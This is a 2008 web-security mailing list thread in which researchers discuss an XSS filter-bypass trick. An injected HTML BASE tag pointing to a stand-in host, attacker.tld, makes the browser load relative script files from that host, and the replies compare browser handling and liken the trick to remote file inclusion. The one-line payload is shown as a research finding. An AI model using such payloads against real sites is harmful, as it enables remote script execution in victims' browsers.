
Re: [WEB SECURITY] Nice little XSS trick



Interesting - there is a hint of remote file inclusion going on here
except that it is browser-side vs what we usually see server side with
PHP.


On 7/15/08, Prasad Shenoy <prasad.shenoy@xxxxxxxxx> wrote:
> Amit -
>
> When you say observed by FF 2, I guess you mean this should not work
> in FF 2 correct? But it works with FF 2.
>
> As this is a very simple example, I would like to believe that you are
> assuming that in order to invoke functions from the attacker
> controlled JS file (because there is no JS involved in the payload),
> the attacker would create a file with the same filename and function
> names as the one on the victim's domain. This way the actual (good) JS
> file will be overwritten by the attacker controlled JS and all the
> functions will be called from cross domain.
>
> Valid?
>
> Thanks
> Prasad Shenoy
>
> Prasad Shenoy
> On Tue, Jul 15, 2008 at 7:33 AM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>> Hi list
>>
>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not
>> on
>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>> BASe, but not the trick I describe here). The idea is to use the HTML BASE
>> tag to force loading of JS code from the attacker's host. Consider a page
>> with XSS vulnerability such as:
>>
>> <html>
>> ...
>> ***XSS code may be embedded here***
>> ...
>> <script src="/foo/bar.js"></script>
>> ...
>> </html>
>>
>> Now, an attacker can inject <base href="http://www.attacker.tld/";>, and
>> next
>> thing you know, the browser (IE, at least) loads the JS from
>> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
>> "explicit" JS code involved in the payload itself.
>>
>> Note that according to the HTML standard, BASE should be placed in the
>> HEAD
>> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This
>> is
>> indeed observed by FF 2, but not by IE (checked IE6).
>>
>> Thanks,
>> -Amit
>>
>>
>> ----------------------------------------------------------------------------
>> Join us on IRC: irc.freenode.net #webappsec
>>
>> Have a question? Search The Web Security Mailing List Archives:
>> http://www.webappsec.org/lists/websecurity/archive/
>>
>> Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>>
>> Join WASC on LinkedIn
>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>
>>
>
>
>
> --
> Ah! the joy of hacking....
>


-- 
Ryan C. Barnett
ModSecurity Community Manager
Breach Security: Director of Application Security
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
Author: Preventing Web Attacks with Apache
